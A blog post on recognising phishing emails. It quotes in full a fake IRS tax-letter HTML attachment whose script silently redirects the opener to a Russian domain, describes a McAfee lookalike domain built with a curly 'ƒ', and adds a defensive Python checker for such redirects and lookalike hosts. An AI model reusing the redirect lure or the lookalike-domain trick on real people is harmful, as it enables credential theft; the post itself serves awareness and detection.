
Phish and chips

 1 year ago
source link: https://boyet.com/blog/phish-and-chips/

6 months ago

A couple of weeks ago, I came across a fascinating blog post about spotting phishing attempts via email: An Annotated Field Guide to Identifying Phish. For me, it’s one of those topics I come back to every now and then, especially when I receive dodgy-looking emails with “simple” HTML links that purport to be legit.

I read this particular post just after getting five (yes, five!) variants of the following email:

(USPS Tax Letter is out for delivery from IRS On January 31, 2023, 2:35:55 AM)
Tax Revenue Letter from IRS.GOV
Message received on January 31, 2023, 2:35:49 AM
Message Transcript "Hello I am calling in regards to your Irs Letter delivery....."

And the included HTML file link (called IRS-TAX-LETTER.HTM to reinforce its legitimacy)? Here you go:

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Redirecting ....</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
</head>
<body>

<div class="container">
<script>
window.location.replace("https://xhnktldlk363c5d9139e8fa.rihann.ru/[email protected]");
</script>
</div>

</body>
</html>

Yep, indeed. If I’d opened that HTML file to see what it showed, I’d have been transported to some GUID-altered URL in Russia. No thanks.

The very next day I got another scam email; this time with the interesting bit being the use of a URL with a non-ASCII character. Ready?

McAfee scam email

Hmm, McAfee.com, right?

I’m pretty sure that, like me, you’d spotted the “curly” lower-case ƒ – it’s even used in the word “feedback”. Well, it’s also used in the “more info” URL to differentiate it from the real mcafee.com domain. Tsk tsk.
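
As an added example (not part of the original post), here is a small Python triage check for the two tricks shown above: an HTML attachment that navigates away as soon as it is opened, and a link whose hostname contains a non-ASCII lookalike character. The function names are hypothetical, and the sample inputs and `.example` hostnames are constructed placeholders.

```python
import re
import unicodedata
from urllib.parse import urlsplit

# Script-driven navigation: location.replace("..."), location.assign("..."), location[.href] = "..."
JS_REDIRECT = re.compile(
    r"""location(?:\.href)?\s*(?:\.(?:replace|assign)\s*\(|=)\s*["']([^"']+)["']""", re.I)
# <meta http-equiv="refresh" content="0; url=...">
META_REFRESH = re.compile(
    r"""<meta[^>]+http-equiv\s*=\s*["']?refresh[^>]*?url\s*=\s*([^"'>\s]+)""", re.I)


def redirect_targets(html):
    """URLs an HTML attachment navigates to without any user click."""
    return JS_REDIRECT.findall(html) + META_REFRESH.findall(html)


def odd_host_chars(url):
    """(char, Unicode name) for each non-ASCII character in the URL's hostname."""
    host = urlsplit(url).hostname or ""
    return [(c, unicodedata.name(c, "UNKNOWN")) for c in host if ord(c) > 127]


def triage(html):
    """Findings for one attachment or body: auto-redirects, lookalike and punycode hosts."""
    findings = [("auto-redirect", url) for url in redirect_targets(html)]
    for url in sorted(set(re.findall(r"""https?://[^\s"'<>)]+""", html))):
        host = urlsplit(url).hostname or ""
        if odd_host_chars(url):
            findings.append(("non-ascii-host", host))
        elif any(label.startswith("xn--") for label in host.split(".")):
            findings.append(("punycode-host", host))
    return findings


# Constructed samples modelled on the two emails above (.example hosts are placeholders).
ATTACHMENT = """<html><body><div class="container"><script>
window.location.replace("https://redirector.example/?e=recipient@mail.example");
</script></div></body></html>"""
LOOKALIKE = '<a href="https://www.mca\u0192ee.example/info">more info</a>'

if __name__ == "__main__":
    for sample in (ATTACHMENT, LOOKALIKE):
        print(triage(sample))
```

A mail gateway or a curious recipient can run this over an attachment's text before anything is opened in a browser; any finding is a reason to quarantine the message for a closer look.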
